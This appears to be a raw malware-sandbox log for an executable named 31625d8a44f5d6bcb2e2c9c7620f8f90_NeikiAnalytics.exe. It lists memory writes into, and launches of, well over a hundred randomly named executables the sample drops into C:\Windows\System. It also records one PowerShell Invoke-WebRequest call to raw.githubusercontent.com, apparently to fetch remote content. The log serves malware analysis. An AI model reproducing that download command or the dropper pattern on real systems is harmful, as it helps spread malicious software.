PID 2020 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\KTiikTj.exe
PID 2020 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\KTiikTj.exe
PID 2020 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\ojzCDbz.exe
PID 2020 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\ojzCDbz.exe
PID 2020 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\ojzCDbz.exe
PID 2020 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\joopXcZ.exe
PID 2020 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\joopXcZ.exe
PID 2020 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\joopXcZ.exe
PID 2020 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\ULyRwor.exe
PID 2020 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\ULyRwor.exe
PID 2020 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\ULyRwor.exe
PID 2020 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\xKDaZJL.exe
PID 2020 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\xKDaZJL.exe
PID 2020 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\xKDaZJL.exe
PID 2020 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\xzLITSS.exe
PID 2020 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\xzLITSS.exe
PID 2020 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\xzLITSS.exe
PID 2020 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\fExXtUj.exe
PID 2020 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\fExXtUj.exe
PID 2020 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\fExXtUj.exe
PID 2020 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\apYRFGp.exe
PID 2020 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\apYRFGp.exe
PID 2020 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\apYRFGp.exe
PID 2020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\rdDKznI.exe
PID 2020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\rdDKznI.exe
PID 2020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\rdDKznI.exe
PID 2020 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\fMowbqv.exe
PID 2020 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\fMowbqv.exe
PID 2020 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\fMowbqv.exe
PID 2020 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\tEOlqnL.exe
PID 2020 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\tEOlqnL.exe
PID 2020 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\tEOlqnL.exe
PID 2020 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\wymELJz.exe
PID 2020 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\wymELJz.exe
PID 2020 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\wymELJz.exe
PID 2020 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\rslSVrA.exe
PID 2020 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\rslSVrA.exe
PID 2020 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\rslSVrA.exe
PID 2020 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\CTQymvh.exe
PID 2020 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\CTQymvh.exe
PID 2020 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\CTQymvh.exe
PID 2020 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\DoHbCaH.exe
PID 2020 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\DoHbCaH.exe
PID 2020 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\DoHbCaH.exe
PID 2020 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\kcIiPuP.exe
PID 2020 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\kcIiPuP.exe
PID 2020 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\kcIiPuP.exe
PID 2020 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\rIklBoa.exe
PID 2020 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\rIklBoa.exe
PID 2020 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\rIklBoa.exe
PID 2020 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\GKwKyLt.exe
PID 2020 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\GKwKyLt.exe
PID 2020 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\GKwKyLt.exe
PID 2020 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\FpgEaDw.exe
PID 2020 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\FpgEaDw.exe
PID 2020 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\FpgEaDw.exe
PID 2020 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\vAJRPkt.exe
PID 2020 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\vAJRPkt.exe
PID 2020 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\vAJRPkt.exe
PID 2020 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\YdNalBW.exe

Processes

C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\KTiikTj.exe

C:\Windows\System\KTiikTj.exe

C:\Windows\System\ojzCDbz.exe

C:\Windows\System\ojzCDbz.exe

C:\Windows\System\joopXcZ.exe

C:\Windows\System\joopXcZ.exe

C:\Windows\System\ULyRwor.exe

C:\Windows\System\ULyRwor.exe

C:\Windows\System\xKDaZJL.exe

C:\Windows\System\xKDaZJL.exe

C:\Windows\System\xzLITSS.exe

C:\Windows\System\xzLITSS.exe

C:\Windows\System\fExXtUj.exe

C:\Windows\System\fExXtUj.exe

C:\Windows\System\apYRFGp.exe

C:\Windows\System\apYRFGp.exe

C:\Windows\System\rdDKznI.exe

C:\Windows\System\rdDKznI.exe

C:\Windows\System\fMowbqv.exe

C:\Windows\System\fMowbqv.exe

C:\Windows\System\tEOlqnL.exe

C:\Windows\System\tEOlqnL.exe

C:\Windows\System\wymELJz.exe

C:\Windows\System\wymELJz.exe

C:\Windows\System\rslSVrA.exe

C:\Windows\System\rslSVrA.exe

C:\Windows\System\CTQymvh.exe

C:\Windows\System\CTQymvh.exe

C:\Windows\System\DoHbCaH.exe

C:\Windows\System\DoHbCaH.exe

C:\Windows\System\kcIiPuP.exe

C:\Windows\System\kcIiPuP.exe

C:\Windows\System\rIklBoa.exe

C:\Windows\System\rIklBoa.exe

C:\Windows\System\GKwKyLt.exe

C:\Windows\System\GKwKyLt.exe

C:\Windows\System\FpgEaDw.exe

C:\Windows\System\FpgEaDw.exe

C:\Windows\System\vAJRPkt.exe

C:\Windows\System\vAJRPkt.exe

C:\Windows\System\YdNalBW.exe

C:\Windows\System\YdNalBW.exe

C:\Windows\System\SpCSNSe.exe

C:\Windows\System\SpCSNSe.exe

C:\Windows\System\TAWkIve.exe

C:\Windows\System\TAWkIve.exe

C:\Windows\System\QjpoHkM.exe

C:\Windows\System\QjpoHkM.exe

C:\Windows\System\BOZpDWW.exe

C:\Windows\System\BOZpDWW.exe

C:\Windows\System\oGdWdwB.exe

C:\Windows\System\oGdWdwB.exe

C:\Windows\System\ouvCBJc.exe

C:\Windows\System\ouvCBJc.exe

C:\Windows\System\gTHOUSB.exe

C:\Windows\System\gTHOUSB.exe

C:\Windows\System\rFQPYLk.exe

C:\Windows\System\rFQPYLk.exe

C:\Windows\System\lfXQeTY.exe

C:\Windows\System\lfXQeTY.exe

C:\Windows\System\eZxfgdn.exe

C:\Windows\System\eZxfgdn.exe

C:\Windows\System\YjAqmPI.exe

C:\Windows\System\YjAqmPI.exe

C:\Windows\System\OPVgLzY.exe

C:\Windows\System\OPVgLzY.exe

C:\Windows\System\atkfxPx.exe

C:\Windows\System\atkfxPx.exe

C:\Windows\System\HkcELJo.exe

C:\Windows\System\HkcELJo.exe

C:\Windows\System\GvwVLKG.exe

C:\Windows\System\GvwVLKG.exe

C:\Windows\System\EvrKRiR.exe

C:\Windows\System\EvrKRiR.exe

C:\Windows\System\kJavAEU.exe

C:\Windows\System\kJavAEU.exe

C:\Windows\System\mAmoAAu.exe

C:\Windows\System\mAmoAAu.exe

C:\Windows\System\GdVBprJ.exe

C:\Windows\System\GdVBprJ.exe

C:\Windows\System\ghgCQUz.exe

C:\Windows\System\ghgCQUz.exe

C:\Windows\System\ELzqPnM.exe

C:\Windows\System\ELzqPnM.exe

C:\Windows\System\KqdAlJn.exe

C:\Windows\System\KqdAlJn.exe

C:\Windows\System\GhoQQod.exe

C:\Windows\System\GhoQQod.exe

C:\Windows\System\AtMLjRH.exe

C:\Windows\System\AtMLjRH.exe

C:\Windows\System\icXnHZp.exe

C:\Windows\System\icXnHZp.exe

C:\Windows\System\JhEclWt.exe

C:\Windows\System\JhEclWt.exe

C:\Windows\System\DjwWCaA.exe

C:\Windows\System\DjwWCaA.exe

C:\Windows\System\kbKJNaF.exe

C:\Windows\System\kbKJNaF.exe

C:\Windows\System\vbqCaNv.exe

C:\Windows\System\vbqCaNv.exe

C:\Windows\System\DxLcRKo.exe

C:\Windows\System\DxLcRKo.exe

C:\Windows\System\znDMNZT.exe

C:\Windows\System\znDMNZT.exe

C:\Windows\System\qPvwtUd.exe

C:\Windows\System\qPvwtUd.exe

C:\Windows\System\yOZMMGt.exe

C:\Windows\System\yOZMMGt.exe

C:\Windows\System\GspMUWC.exe

C:\Windows\System\GspMUWC.exe

C:\Windows\System\GVXjhjf.exe

C:\Windows\System\GVXjhjf.exe

C:\Windows\System\DGelCUA.exe

C:\Windows\System\DGelCUA.exe

C:\Windows\System\EaZNUZq.exe

C:\Windows\System\EaZNUZq.exe

C:\Windows\System\YhImzqk.exe

C:\Windows\System\YhImzqk.exe

C:\Windows\System\rIsnEbB.exe

C:\Windows\System\rIsnEbB.exe

C:\Windows\System\RMhEQGm.exe

C:\Windows\System\RMhEQGm.exe

C:\Windows\System\KHFgbEs.exe

C:\Windows\System\KHFgbEs.exe

C:\Windows\System\uWeCRrf.exe

C:\Windows\System\uWeCRrf.exe

C:\Windows\System\CvYxokP.exe

C:\Windows\System\CvYxokP.exe

C:\Windows\System\eqrQGpz.exe

C:\Windows\System\eqrQGpz.exe

C:\Windows\System\WcVzsvk.exe

C:\Windows\System\WcVzsvk.exe

C:\Windows\System\HeQrVlo.exe

C:\Windows\System\HeQrVlo.exe

C:\Windows\System\nFiKrJd.exe

C:\Windows\System\nFiKrJd.exe

C:\Windows\System\igKQhPj.exe

C:\Windows\System\igKQhPj.exe

C:\Windows\System\OiWQCPd.exe

C:\Windows\System\OiWQCPd.exe

C:\Windows\System\tuCdzlV.exe

C:\Windows\System\tuCdzlV.exe

C:\Windows\System\ZQMyTjz.exe

C:\Windows\System\ZQMyTjz.exe

C:\Windows\System\tQCcnYj.exe

C:\Windows\System\tQCcnYj.exe

C:\Windows\System\nQWMeEy.exe

C:\Windows\System\nQWMeEy.exe

C:\Windows\System\PowxUFW.exe

C:\Windows\System\PowxUFW.exe

C:\Windows\System\XfUNqgC.exe

C:\Windows\System\XfUNqgC.exe

C:\Windows\System\iQnIbOu.exe

C:\Windows\System\iQnIbOu.exe

C:\Windows\System\IhYrONO.exe

C:\Windows\System\IhYrONO.exe

C:\Windows\System\tofwwVu.exe

C:\Windows\System\tofwwVu.exe

C:\Windows\System\IsenbXb.exe

C:\Windows\System\IsenbXb.exe

C:\Windows\System\NHCElwf.exe

C:\Windows\System\NHCElwf.exe

C:\Windows\System\iWvkysE.exe

C:\Windows\System\iWvkysE.exe

C:\Windows\System\oIYRxXj.exe

C:\Windows\System\oIYRxXj.exe

C:\Windows\System\JsDiTxv.exe

C:\Windows\System\JsDiTxv.exe

C:\Windows\System\RtTzGfa.exe

C:\Windows\System\RtTzGfa.exe

C:\Windows\System\JQKYehW.exe

C:\Windows\System\JQKYehW.exe

C:\Windows\System\XnAOpgq.exe

C:\Windows\System\XnAOpgq.exe

C:\Windows\System\QYqNQNM.exe

C:\Windows\System\QYqNQNM.exe

C:\Windows\System\VJdOJjk.exe

C:\Windows\System\VJdOJjk.exe

C:\Windows\System\zSwfDUC.exe

C:\Windows\System\zSwfDUC.exe

C:\Windows\System\WmGbvhq.exe

C:\Windows\System\WmGbvhq.exe

C:\Windows\System\kNSOOZu.exe

C:\Windows\System\kNSOOZu.exe

C:\Windows\System\nfMdULr.exe

C:\Windows\System\nfMdULr.exe

C:\Windows\System\KJhfFlA.exe

C:\Windows\System\KJhfFlA.exe

C:\Windows\System\iRyjQiT.exe

C:\Windows\System\iRyjQiT.exe

C:\Windows\System\AwLGnwZ.exe

C:\Windows\System\AwLGnwZ.exe

C:\Windows\System\fYdUHUJ.exe

C:\Windows\System\fYdUHUJ.exe

C:\Windows\System\SpifpTc.exe

C:\Windows\System\SpifpTc.exe

C:\Windows\System\wpNCVVJ.exe

C:\Windows\System\wpNCVVJ.exe

C:\Windows\System\GeLDxKR.exe

C:\Windows\System\GeLDxKR.exe

C:\Windows\System\oGowVCM.exe

C:\Windows\System\oGowVCM.exe

C:\Windows\System\umlyRrv.exe

C:\Windows\System\umlyRrv.exe

C:\Windows\System\DpknSfG.exe

C:\Windows\System\DpknSfG.exe

C:\Windows\System\rrBZucd.exe

C:\Windows\System\rrBZucd.exe

C:\Windows\System\YXcEYaQ.exe

C:\Windows\System\YXcEYaQ.exe

C:\Windows\System\YYGeLyC.exe

C:\Windows\System\YYGeLyC.exe

C:\Windows\System\hDRVsVR.exe

C:\Windows\System\hDRVsVR.exe

C:\Windows\System\DKfRDIP.exe

C:\Windows\System\DKfRDIP.exe

C:\Windows\System\RIbsUrG.exe

C:\Windows\System\RIbsUrG.exe

C:\Windows\System\zWUcjsV.exe

C:\Windows\System\zWUcjsV.exe

C:\Windows\System\DezvdHg.exe

C:\Windows\System\DezvdHg.exe

C:\Windows\System\HrpUHsD.exe

C:\Windows\System\HrpUHsD.exe

C:\Windows\System\nfzrPpD.exe

C:\Windows\System\nfzrPpD.exe

C:\Windows\System\NVubdtH.exe

C:\Windows\System\NVubdtH.exe

C:\Windows\System\QCnELds.exe

C:\Windows\System\QCnELds.exe

C:\Windows\System\utVOfFN.exe

C:\Windows\System\utVOfFN.exe

C:\Windows\System\fAcemnt.exe

C:\Windows\System\fAcemnt.exe

C:\Windows\System\OnFogoh.exe

C:\Windows\System\OnFogoh.exe

C:\Windows\System\aaYCRoE.exe

C:\Windows\System\aaYCRoE.exe

C:\Windows\System\MBcrMYd.exe

C:\Windows\System\MBcrMYd.exe

C:\Windows\System\iqHXtxv.exe

C:\Windows\System\iqHXtxv.exe

C:\Windows\System\uOzvTnP.exe

C:\Windows\System\uOzvTnP.exe

C:\Windows\System\qtqFFEp.exe

C:\Windows\System\qtqFFEp.exe

C:\Windows\System\jRJzCWt.exe

C:\Windows\System\jRJzCWt.exe

C:\Windows\System\ohdBzZv.exe

C:\Windows\System\ohdBzZv.exe

C:\Windows\System\tdfLOCK.exe

C:\Windows\System\tdfLOCK.exe

C:\Windows\System\KzRALOQ.exe

C:\Windows\System\KzRALOQ.exe

C:\Windows\System\XttuSWq.exe

C:\Windows\System\XttuSWq.exe

C:\Windows\System\gNftcsj.exe

C:\Windows\System\gNftcsj.exe

C:\Windows\System\ECADfPI.exe

C:\Windows\System\ECADfPI.exe

C:\Windows\System\iVZUBhC.exe

C:\Windows\System\iVZUBhC.exe

C:\Windows\System\AKkqrnR.exe

C:\Windows\System\AKkqrnR.exe

C:\Windows\System\qEFvycl.exe

C:\Windows\System\qEFvycl.exe

C:\Windows\System\KxoZdhZ.exe

C:\Windows\System\KxoZdhZ.exe

C:\Windows\System\JnZABYX.exe

C:\Windows\System\JnZABYX.exe

C:\Windows\System\bZQpXDM.exe

C:\Windows\System\bZQpXDM.exe

C:\Windows\System\pmiKCiH.exe

C:\Windows\System\pmiKCiH.exe

C:\Windows\System\eVUNHJf.exe

C:\Windows\System\eVUNHJf.exe

C:\Windows\System\yRGTAfL.exe

C:\Windows\System\yRGTAfL.exe

C:\Windows\System\GXdWwpG.exe

C:\Windows\System\GXdWwpG.exe

C:\Windows\System\FZGPGwW.exe

C:\Windows\System\FZGPGwW.exe

C:\Windows\System\kiqPelY.exe

C:\Windows\System\kiqPelY.exe

C:\Windows\System\wCVydQF.exe

C:\Windows\System\wCVydQF.exe

C:\Windows\System\IMJGsCJ.exe

C:\Windows\System\IMJGsCJ.exe

C:\Windows\System\gBCsUOt.exe

C:\Windows\System\gBCsUOt.exe

C:\Windows\System\uKXsjsd.exe

C:\Windows\System\uKXsjsd.exe

C:\Windows\System\HTtBNpo.exe

C:\Windows\System\HTtBNpo.exe

C:\Windows\System\lKIimUt.exe

C:\Windows\System\lKIimUt.exe

C:\Windows\System\LCrthgZ.exe

C:\Windows\System\LCrthgZ.exe

C:\Windows\System\dWtjUFf.exe

C:\Windows\System\dWtjUFf.exe

C:\Windows\System\ldlIeCe.exe

C:\Windows\System\ldlIeCe.exe

C:\Windows\System\ZfjZiqz.exe

C:\Windows\System\ZfjZiqz.exe

C:\Windows\System\bgIjYEK.exe

C:\Windows\System\bgIjYEK.exe

C:\Windows\System\qGAmggm.exe

C:\Windows\System\qGAmggm.exe

C:\Windows\System\vzuTKJp.exe

C:\Windows\System\vzuTKJp.exe

C:\Windows\System\PuRKrBR.exe

C:\Windows\System\PuRKrBR.exe

C:\Windows\System\ACEWaWB.exe

C:\Windows\System\ACEWaWB.exe

C:\Windows\System\gXRHUUI.exe

C:\Windows\System\gXRHUUI.exe

C:\Windows\System\WLpmnMM.exe

C:\Windows\System\WLpmnMM.exe

C:\Windows\System\tSWIVnU.exe

C:\Windows\System\tSWIVnU.exe

C:\Windows\System\WgUTKCu.exe

C:\Windows\System\WgUTKCu.exe

C:\Windows\System\yhlCPeh.exe

C:\Windows\System\yhlCPeh.exe

C:\Windows\System\lXWOUhM.exe

C:\Windows\System\lXWOUhM.exe

C:\Windows\System\fdNSNiZ.exe

C:\Windows\System\fdNSNiZ.exe

C:\Windows\System\EfRULtK.exe

C:\Windows\System\EfRULtK.exe

C:\Windows\System\KSnlaIn.exe

C:\Windows\System\KSnlaIn.exe

C:\Windows\System\CulComK.exe

C:\Windows\System\CulComK.exe

C:\Windows\System\nSpPsEX.exe

C:\Windows\System\nSpPsEX.exe

C:\Windows\System\zcaqbon.exe

C:\Windows\System\zcaqbon.exe

C:\Windows\System\zlqhFBy.exe

C:\Windows\System\zlqhFBy.exe

C:\Windows\System\LhasEYB.exe

C:\Windows\System\LhasEYB.exe

C:\Windows\System\ZqKLlZt.exe

C:\Windows\System\ZqKLlZt.exe

C:\Windows\System\lcKuaVY.exe

C:\Windows\System\lcKuaVY.exe

C:\Windows\System\tywFXBV.exe

C:\Windows\System\tywFXBV.exe

C:\Windows\System\bHJrgVA.exe

C:\Windows\System\bHJrgVA.exe

C:\Windows\System\WcaQlhB.exe

C:\Windows\System\WcaQlhB.exe

C:\Windows\System\XHDkZCJ.exe

C:\Windows\System\XHDkZCJ.exe

C:\Windows\System\mIKqhBy.exe

C:\Windows\System\mIKqhBy.exe

C:\Windows\System\pgEPDgb.exe

C:\Windows\System\pgEPDgb.exe

C:\Windows\System\LZFpYmg.exe

C:\Windows\System\LZFpYmg.exe

C:\Windows\System\IeudJef.exe

C:\Windows\System\IeudJef.exe

C:\Windows\System\bXnlWfO.exe

C:\Windows\System\bXnlWfO.exe

C:\Windows\System\HszQxuO.exe

C:\Windows\System\HszQxuO.exe

C:\Windows\System\eGWSlkZ.exe

C:\Windows\System\eGWSlkZ.exe

C:\Windows\System\fwrYffA.exe

C:\Windows\System\fwrYffA.exe

C:\Windows\System\pPRHozi.exe

C:\Windows\System\pPRHozi.exe

C:\Windows\System\nTguhRI.exe

C:\Windows\System\nTguhRI.exe

C:\Windows\System\IetHnmu.exe

C:\Windows\System\IetHnmu.exe

C:\Windows\System\entMUUm.exe

C:\Windows\System\entMUUm.exe

C:\Windows\System\izRvZGN.exe

C:\Windows\System\izRvZGN.exe

C:\Windows\System\bnUSEut.exe

C:\Windows\System\bnUSEut.exe

C:\Windows\System\nMSFdPZ.exe

C:\Windows\System\nMSFdPZ.exe

C:\Windows\System\kOlXipA.exe

C:\Windows\System\kOlXipA.exe

C:\Windows\System\tCfBTlP.exe

C:\Windows\System\tCfBTlP.exe

C:\Windows\System\VBrPHln.exe

C:\Windows\System\VBrPHln.exe

C:\Windows\System\DWJvBiF.exe

C:\Windows\System\DWJvBiF.exe

C:\Windows\System\OxxUYJq.exe

C:\Windows\System\OxxUYJq.exe

C:\Windows\System\KSpegkB.exe

C:\Windows\System\KSpegkB.exe

C:\Windows\System\uXTryIF.exe

C:\Windows\System\uXTryIF.exe

C:\Windows\System\VulTJaE.exe

C:\Windows\System\VulTJaE.exe

C:\Windows\System\avuhFNM.exe

C:\Windows\System\avuhFNM.exe

C:\Windows\System\hcOlVSv.exe

C:\Windows\System\hcOlVSv.exe

C:\Windows\System\cYoMBMX.exe

C:\Windows\System\cYoMBMX.exe

C:\Windows\System\weZDuOv.exe

C:\Windows\System\weZDuOv.exe

C:\Windows\System\XvydbpF.exe

C:\Windows\System\XvydbpF.exe

C:\Windows\System\lSTkKGT.exe

C:\Windows\System\lSTkKGT.exe

C:\Windows\System\NgSfrVl.exe

C:\Windows\System\NgSfrVl.exe

C:\Windows\System\jydWvRy.exe

C:\Windows\System\jydWvRy.exe

C:\Windows\System\lORocdT.exe

C:\Windows\System\lORocdT.exe

C:\Windows\System\dwjCaTV.exe

C:\Windows\System\dwjCaTV.exe

C:\Windows\System\iHSGTsR.exe

C:\Windows\System\iHSGTsR.exe

C:\Windows\System\noXzAXE.exe

C:\Windows\System\noXzAXE.exe

C:\Windows\System\TUeCBYT.exe

C:\Windows\System\TUeCBYT.exe

C:\Windows\System\roimIrg.exe

C:\Windows\System\roimIrg.exe

C:\Windows\System\xelSnxH.exe

C:\Windows\System\xelSnxH.exe

C:\Windows\System\srFHCWg.exe

C:\Windows\System\srFHCWg.exe

C:\Windows\System\KKlFOjV.exe

C:\Windows\System\KKlFOjV.exe

C:\Windows\System\bYZnBaR.exe

C:\Windows\System\bYZnBaR.exe

C:\Windows\System\khLRmPI.exe

C:\Windows\System\khLRmPI.exe

C:\Windows\System\CCyWsaM.exe

C:\Windows\System\CCyWsaM.exe

C:\Windows\System\IjVoVcq.exe

C:\Windows\System\IjVoVcq.exe

C:\Windows\System\fIXTugJ.exe

C:\Windows\System\fIXTugJ.exe

C:\Windows\System\IFqqOLN.exe

C:\Windows\System\IFqqOLN.exe

C:\Windows\System\paVpqmp.exe

C:\Windows\System\paVpqmp.exe

C:\Windows\System\aXezmZz.exe

C:\Windows\System\aXezmZz.exe

C:\Windows\System\VfVzCcV.exe

C:\Windows\System\VfVzCcV.exe

C:\Windows\System\WRoUwwu.exe

